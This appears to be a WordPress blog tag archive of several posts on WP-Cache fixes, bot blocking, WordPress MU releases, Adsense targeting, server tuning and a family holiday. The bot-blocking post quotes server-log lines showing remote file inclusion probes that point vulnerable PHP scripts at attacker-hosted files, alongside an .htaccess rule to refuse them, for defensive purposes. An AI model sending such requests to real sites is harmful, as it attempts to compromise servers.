Tag Archives: WordPress

Howto: WP-Cache and protected posts

If you use protected posts on your WordPress blog you may have noticed that WP-Cache doesn’t cache those password protected posts properly. I didn’t know this, but James Farmer did so I went looking and found a fix.

In the plugins/wp-cache/ directory, open wp-cache-phase1.php in your favourite text editor and look for the following line:

if (preg_match(“/^wordpress|^comment_author_email_/”, $key)) {

Replace that line with this one:

if (preg_match(“/^wp-postpass|^wordpress|^comment_author_email_/”, $key)) {

Save and upload the file if necessary and clear your cache. Password protect posts should be cached properly now!

Ironically, this post wasn’t being cached by WP-Cache because the url contains the string “wp-“. Here’s how to fix that bug. Open wp-cache-phase2.php and look for the following line:

if (strlen($expr) > 0 && strstr($uri, $expr))

Change it to read:

if (strlen($expr) > 0 && substr( $uri, 1, strlen($expr) ) == $expr )

Phew. This post is now cached.

Keep the libwww-perl bots out

If you look through your server logs you’ll probably notice more than a few requests like these:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … “libwww-perl/5.805”
GET /2004/02/18/smoking-ban-is-on-the-way/trackback/ … “libwww-perl/5.805”
GET /2004/02/18/irish-car-tax-list/trackback/ … “libwww-perl/5.805”
GET /tag/php//tags.php?BBCodeFile=http://drpepper.gigacities.net/id.txt? … “libwww-perl/5.579”

If you do find them (grep libwww-perl access_log) then add the following code to your .htaccess file. On a WordPress site this file should already be there if you’re using fancy permalinks.

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* – [F,L]

Change “RewriteBase /” to suit your own base directory.

There are other bad guys out there. This page has a long list of rewrite rules to keep out all sorts of bots! I haven’t looked through them myself so YMMV if you try them.

This has the added benefit of reducing load on your server. WordPress sites are dynamically generated. This is great under normal circumstances but when you get a flood of requests it can place an unnecessary load on your site. WP-Cache helps a lot but these rules will stop them dead at the front door!

PS. ‘Course, if you depend on a libwww-perl application then don’t add this rule or you may give yourself a headache trying to figure out why things stopped working!

Back from Dingle

Oh wow! We really have a beautiful country here in Ireland! We are just back from a week in the town of Dingle, Co. Kerry (or An Daingean as it’s officially known, why can’t they have both English and Irish names on the signs? It’s silly. Locals stencilled “Dingle” on many of the signs anyway!) and it was both amazing and refreshing. 7 days without Internet access. Could you survive? I admit I was tempted by the local net cafe but I resisted and we wandered the roads and explored the beaches of that rugged coastline instead.

Weather is always a concern in Ireland and it rained and it poured and gales blew for the first 2 days of our stay. Thankfully that completely changed for most of the remainder of the week and the blue skies were filled with white fluffy clouds casting shadows on the distant mountains. Breathtaking.

Bringing a 23 week old baby away on holiday does present it’s own difficulties but Adam enjoyed himself and made a huge impression on everyone he met. He was generally well behaved while out, and I have to thank the kind staff of the Old Smokehouse Restaurant for their patience as we made 2 trips there with him. On the other hand, the grumpy floor manager of the “Happy Garden Palace” up the street didn’t live up to his establishment’s name. Nice Kung Po though.

Photos will appear in time but tomorrow we’re going to head down to Kinsale for a look at Haydn’s Kinsale Gallery where some of my work is on display. Adam’s been down there already and now it remains to be seen whether any of the pieces attracts a buyer or not. Thanks Damien for mentioning the gallery too!

In other news, WordPress 2.3 came out and I need to upgrade my blogs. WordPress MU will need to be synced with the new release but it will also need a separate upgrader. Upgrading one blog and adding 3 tables is simple, but when you need to do tens of thousands (or millions) of them, you don’t want all of them doing it at the same time or your database server will melt.

Oh, and not one person mentioned the All Ireland. 🙂

Update on Sunday: Jacinta and I visited the gallery today and we’re impressed! Haydn’s son was taking care of the shop and I noticed a number of the larger prints had sold a couple of copies. Two of my images are visible behind the door if you look carefully at the second image: Innovative Streets and Rusted and Abandoned.

Gallery ICA

Gallery ICA

Gallery ICA

WordPress MU 1.2.5

A new release of WordPress MU, the multi-user, multi-blog version of WordPress is now available.

This is a security release to address issues brought to our attention by Alexander Concha who I must thank for his unfailing patience while we sorted out this release.

Edit: this release is based on WordPress 2.2.3. Unfortunately a last minute bug crept in where post titles looked like post slugs when viewed on your blog. I quickly rolled together a new minor release, 1.2.5a which has an updated wpmu-functions.php. The download page has been updated too. If you have already updated your install, all you have to do is go to this page and download a new wpmu-functions.php and place it in your wp-includes directory. Apologies for the mix up!

Edit 2: I forgot to mention yesterday that a lot of the functions that were in the files in mu-plugins/ have been moved into wp-includes/wpmu-functions.php so move those files out of the way if you get errors about functions already existing. As stated previously on the forum, kses.php is synced with the one in WordPress which means class and id will be stripped from posts. If you’re happy for your users to use the class and id tag attributes then the following function will come in handy. Put it in mu-plugins/kses.php where it will be activated automatically.

function addabitofclass( $tags ) {
    global $allowedposttags;
    foreach( $allowedposttags as $tag => $attr ) {
        $attr[ 'class' ] = array();
        $attr[ 'id' ] = array();
        $allowedposttags[ $tag ] = $attr;
    }
    return $allowedposttags;
}
add_filter( 'edit_allowedposttags', 'addabitofclass' );

The observant among you will notice I forgot to assign the result of the filter in wp-includes/kses.php. This has since been fixed but it was too late for this release. Making it a global in the function above was a suitable work around.

Friends don't let friends see adverts

This post has been a long time in the writing. Ever since I started advertising on my blogs my strategies have been tweaked continuously so consider this post a snapshot description of what I’m doing with Adsense advertising now. This is a long post, but read through it. The plugin I use to do most of this stuff is linked near the end.

Last year at the IT@Cork Web 2.0 conference, Gavin mentioned that he earns enough off his blogs to pay for his hosting, and I thought to myself that it would be handy to have an extra bit of cash to do likewise. I didn’t do anything about it until July when I signed up for an Adsense account and put some ads on the site. Things were slow that month but they’ve steadily improved to the point that it’s a reasonable second income now.

At last year’s WordCamp in San Francisco, one of the talks was about monetizing your blog. It was a fascinating talk with a great discussion afterwards and I brought home some good ideas:

  • Don’t show adverts to your friends. They are the people who visit your blog and leave comments. They’re not going to click the ads anyway.
  • Position matters. Right underneath the post title and above the content is the best place on a blog to put an advert. (Thanks Matt!)
  • Go as wide as you can.
  • Experiment with ad colours, borders and sizes. Don’t accept the Google defaults. Blend your ads or make them stick out. It all depends on your blog.

Since then I’ve developed my ad serving strategies further:

  • I love when people comment, and I’m honoured when people subscribe to my blog. Therefore I won’t show my RSS or email readers adverts. If you like what I do enough to subscribe I won’t burden you with advertising. You’re my friend.
  • Don’t show adverts on the homepage.
  • Adsense Injection is great for putting adverts directly into posts.
  • Monetize your archive. Any post older than a month gets adverts.
  • Don’t show adverts to Digg, Delicious and Stumbleupon visitors.
  • Identify where most of your “just passing through” traffic is coming from and show them adverts, except for social bookmarking websites of course.
  • If my blog showed you adverts, I’ll tell you “Don’t like adverts? Leave a comment and they disappear.” below the comments form. At least one person has commented favourably about that.
  • Fill the competitive ad filter with low paying URLs. If you’re still showing ads from helium.com then you’re missing out. If your daily eCPM isn’t at least $5 you’re not making the most of your advertising. Subscribe to notspam.org to see which MFA and low paying sites go into my competitive ad filter. I’ll talk about the competitive ad filter in more detail in a future post.
  • Set an hour long cookie for users from search engines. Blogs have a notoriously low attention span for most visitors but if they click to the front page, show them a few more ads.
  • I use Kontera too but the returns from that have been very disappointing. One of my posts has an AuctionAds unit in it. You’ll see that no matter what because I’m testing it for a few weeks and the post in question is almost always only hit by visitors from Google.

I run advertising on my photoblog, In Photos dot org too but the rules there are a bit different:

  • Each post has a big image, pushing the text description below the fold. That’s not ideal for displaying adverts so I use the left sidebar to show a 600px high Adsense skyscraper unit.
  • Show the sidebar advert even on the homepage. It’s not an ideal location so better give it as much exposure as possible.
  • It’s difficult to attract visitors to a photoblog. I wrote 11 seo tips for your photoblog to outline some of the ways I draw traffic in. The biggest mistake is definitely not writing about your photography. If there is no text, how can the search engines figure out what your blog is about?

I’m not the only one only showing adverts to selective visitors. Recently Ben Gillbanks had a great post on increasing Adsense earnings that says some of the same things I summarised here.

I haven’t tried it yet, but the who sees ads plugin from Ozh does most of the same checks I do. That plugin won the WordPress plugin competition so congratulations to Ozh on winning!

The No Adverts for Friends plugin

Announcing my shiny new, rough as anything No Adverts for Friends plugin! This plugin adds new commands that you can use in your templates. Use them to surround your Google Adsense or other advertising code.

The No Adverts for Friends API:

  • is_regular_user() – returns true if the visitor has left a comment or is logged into your blog.
  • is_whitelisted_site( $url ) – returns true if $url is in a pre-defined list of friend sites like Digg, Delicious and StumbleUpon.
  • is_old_post() – returns true if the current post is over a month old.
  • is_searchengine_user() – if a user comes from one of the listed search engines or this is an old post return true.

Each of the API calls depends on the one before it returning a favourable value. For example, is_old_post() won’t return true if is_regular_user() returned true, no matter how old the post is.

Example usage:
<?php if( is_searchengine_user() == false ) { echo "Google adsense code goes here"; }?>
Edit single.php in your current theme and add that code somewhere within the loop. Now either visit an old page on your blog or use a Google search query to bring you to your blog. Hopefully you’ll see the text “Google adsense code goes here”. Replace this text with the Google Adsense Javascript.

Download

Install

  1. Rename both files to .php and place friendsadverts.php in your plugins folder. If you use WP-Cache copy wp-cache-phase1.php into plugins/wp-cache/ overwriting the file already there (make a backup first!)
  2. If you use WP-Cache copy the $nevershowads and $passingthrough arrays from friendsadverts.php into your wp-config.php. They’re needed by WP-Cache which kicks in well before plugins are loaded.
  3. Activate the “No Adverts for Friends” plugin from your plugins page and modify your templates using the new API.

Well, you’ve read this far. If some of the advice in this post helps you, if you like this plugin, if it improves the user experience of your regular visitors and maybe even increases your advertising revenue please consider uncommenting the add_action() command at the start of friendsadverts.php. The donnchas_happy_happy_notice() function prints a message in your blog’s footer saying you use this plugin and links back here.

Thanks John for bugging me to write this up. Hopefully I’ll see you at next year’s WordCamp!

Is your eAccelerator cache dir still there?

While looking through this WordPress performance post I realised that eAccelerator might not be running properly on this blog. For some time I’ve noticed this site hasn’t been as quick off the mark as it used to be. Dare I say it, but it was even a little sluggish!

If you’re not familiar with it, eAccelerator is a PHP accelerator. It caches PHP bytecode and performs optimizations to make your PHP site run a lot faster.

I verified that eAccelerator was loaded and then checked my php.ini configuration. Sure enough, the eaccelerator.cache_dir directive was set to “/tmp/eacc/” and that directory was deleted the last time my server rebooted.

A permanent fix is to change the location of the cache dir. Put it anywhere the webserver can read, but don’t put it in /tmp/.

While you’re looking at eAccelerator, upgrade to the latest version, especially if you’re running PHP5.

Idiot spammers

This comment was posted automatically using Blog Comment Poster. Check out its site to learn more and start building backlinks to your websites today.

This post was written manually using Donncha’s fingers. Check out the Akismet anti comment-spam plugin to stop the idiot spammer at 75.126.132.23 using “Blog Comment Poster”.

Comment Referrers 0.1

comment-referrers.png

Here’s a small plugin that does a small but useful task. It reports where the people who comment on your blog come from. It then adds a line to the end of your comment notification or moderation emails with that information.

Download: comment-referrers.txt

Install by renaming the file to .php and placing in your plugins folder and activating it on your WordPress plugins page.

Update! Here’s the plugin page for this plugin.

Notes when upgrading to PHP5

I upgraded one of my servers to PHP5 this morning. Two things to watch out for:

  • The location of your php.ini may have changed. It’s probably now in /etc/php5/apache2/. You need to copy over any changes from your old one.
  • Update your libraries too such as the mysql client and the gd library. Don’t forget you can delete the old ones. apt-get install php5-mysql php5-gd will do the job of installing, the old packages have a php4 prefix.
  • WP-Cache doesn’t like PHP5 much. If you see a blank page after upgrading to PHP5, then hit reload and it loads, then WP-Cache needs to be modified. Leroy has the fix, open wp-cache-phase2.php in your wp-cache folder and change ob_end_clean() to ob_end_flush(). SImple as that!

The reason for the upgrade? I wanted to install the gd extension, but after lots of fun upgrading everything my browser tried to download every page, complaining that it was a phtml file. I chose the upgrade to PHP5 to fix it!

And finally, the reason for gd, was to get the heatmap in this wordpress click tracking plugin working. It’s like Crazy Egg and it works well, but I couldn’t get it to display a heatmap for any page other than the front page. Some of the comments on Daily Blog Tips where I found it are hilarious. They completely miss the point of using a heatmap!

Close

Ad-blocker not detected

Consider installing a browser extension that blocks ads and other malicious scripts in your browser to protect your privacy and security. Here are a few options.

  • uBlock Origin is a free, open source, ad blocker for your browser.
  • Use pi-hole if you have a spare Raspberry Pi on your network.
  • Set the private DNS settings on your phone to dns.adguard.com to block adverts and trackers.